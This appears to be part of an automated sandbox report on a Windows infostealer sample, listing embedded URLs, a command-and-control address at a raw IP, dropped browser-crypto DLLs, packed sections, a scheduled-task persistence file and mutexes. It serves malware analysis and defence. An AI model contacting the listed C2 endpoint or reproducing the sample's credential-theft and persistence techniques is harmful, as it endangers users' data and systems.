Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php5
Source: 3eb62d09c2.exe, 0000000D.00000002.2515715104.0000000001CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpsHy~
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: EZrw1nNIpG.exe, random[1].exe.10.dr, 3eb62d09c2.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: EZrw1nNIpG.exe, random[1].exe.10.dr, 3eb62d09c2.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: EZrw1nNIpG.exe, random[1].exe.10.dr, 3eb62d09c2.exe.10.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: EZrw1nNIpG.exe, EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: EZrw1nNIpG.exe, 00000000.00000002.2417623775.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: EZrw1nNIpG.exe, 00000000.00000003.2249129758.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJK.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org#
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2385661873.0000000000858000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: EZrw1nNIpG.exe, 00000000.00000002.2385661873.000000000095A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: EZrw1nNIpG.exe, 00000000.00000002.2389921177.000000000176F000.00000004.00000020.00020000.00000000.sdmp, ECGDHDHJEBGHJKFIECBG.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary

Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name: .idata
Source: KKEBKJJDGH.exe.0.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: EZrw1nNIpG.exe Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: 3eb62d09c2.exe.10.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C82B700
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C82B8C0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C82B910
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7CF280
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C35A0 0_2_6C7C35A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8234A0 0_2_6C8234A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82C4A0 0_2_6C82C4A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D5440 0_2_6C7D5440
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C806CF0 0_2_6C806CF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83AC00 0_2_6C83AC00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C805C10 0_2_6C805C10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C812C10 0_2_6C812C10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CD4E0 0_2_6C7CD4E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83542B 0_2_6C83542B
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7ED4D0 0_2_6C7ED4D0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D64C0 0_2_6C7D64C0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83545C 0_2_6C83545C
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D6C80 0_2_6C7D6C80
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C800DD0 0_2_6C800DD0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F0512 0_2_6C7F0512
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EED10 0_2_6C7EED10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8285F0 0_2_6C8285F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DFD00 0_2_6C7DFD00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C82E680 0_2_6C82E680
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CC670 0_2_6C7CC670
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C824EA0 0_2_6C824EA0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E9E50 0_2_6C7E9E50
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E4640 0_2_6C7E4640
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8376E3 0_2_6C8376E3
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C815600 0_2_6C815600
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CBEF0 0_2_6C7CBEF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DFEF0 0_2_6C7DFEF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C807E10 0_2_6C807E10
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C829E30 0_2_6C829E30
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C812E4E 0_2_6C812E4E
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C803E50 0_2_6C803E50
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C836E63 0_2_6C836E63
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E5E90 0_2_6C7E5E90
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8177A0 0_2_6C8177A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D9F00 0_2_6C7D9F00
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F6FF0 0_2_6C7F6FF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C807710 0_2_6C807710
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CDFE0 0_2_6C7CDFE0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E8850 0_2_6C7E8850
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7ED850 0_2_6C7ED850
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8350C7 0_2_6C8350C7
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8058E0 0_2_6C8058E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7D7810 0_2_6C7D7810
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EC0E0 0_2_6C7EC0E0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80B820 0_2_6C80B820
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C814820 0_2_6C814820
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F60A0 0_2_6C7F60A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80F070 0_2_6C80F070
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C805190 0_2_6C805190
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C822990 0_2_6C822990
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DD960 0_2_6C7DD960
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7EA940 0_2_6C7EA940
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7FD9B0 0_2_6C7FD9B0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CC9A0 0_2_6C7CC9A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C81B970 0_2_6C81B970
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83B170 0_2_6C83B170
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C83BA90 0_2_6C83BA90
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C832AB0 0_2_6C832AB0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C808AC0 0_2_6C808AC0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80E2F0 0_2_6C80E2F0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7E1AF0 0_2_6C7E1AF0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DCAB0 0_2_6C7DCAB0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C22A0 0_2_6C7C22A0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7F4AA0 0_2_6C7F4AA0
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C809A60 0_2_6C809A60
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7DC370 0_2_6C7DC370
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7C5340 0_2_6C7C5340
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C8353C8 0_2_6C8353C8
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C80D320 0_2_6C80D320
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C7CF380 0_2_6C7CF380
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00262818 10_2_00262818
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00224CD0 10_2_00224CD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00257533 10_2_00257533
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00266E0B 10_2_00266E0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_002666B9 10_2_002666B9
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00224AD0 10_2_00224AD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00267ED0 10_2_00267ED0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00266F2B 10_2_00266F2B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 10_2_00262380 10_2_00262380
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F210000 13_2_7F210000
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Code function: 13_2_7F2109B9 13_2_7F2109B9
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: String function: 6C7FCBE8 appears 134 times
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: String function: 6C8094D0 appears 90 times
Source: EZrw1nNIpG.exe, 00000000.00000002.2418828385.000000006CA45000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs EZrw1nNIpG.exe
Source: EZrw1nNIpG.exe, 00000000.00000002.2417944782.000000006C852000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs EZrw1nNIpG.exe
Source: EZrw1nNIpG.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.9994998094512195
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.99383544921875
Source: EZrw1nNIpG.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: amadka[1].exe.0.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: KKEBKJJDGH.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: KKEBKJJDGH.exe.0.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: explortu.exe.8.dr Static PE information: Section: ZLIB complexity 0.9981702867445055
Source: explortu.exe.8.dr Static PE information: Section: kcajosdi ZLIB complexity 0.9943970017899761
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9935302734375
Source: random[1].exe.10.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9935302734375
Source: 3eb62d09c2.exe.10.dr Static PE information: Section: ZLIB complexity 0.9896240234375
Source: explortu.exe.8.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: KKEBKJJDGH.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/30@0/3
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Code function: 0_2_6C827030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C827030
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File read: C:\Users\user\Desktop\desktop.ini
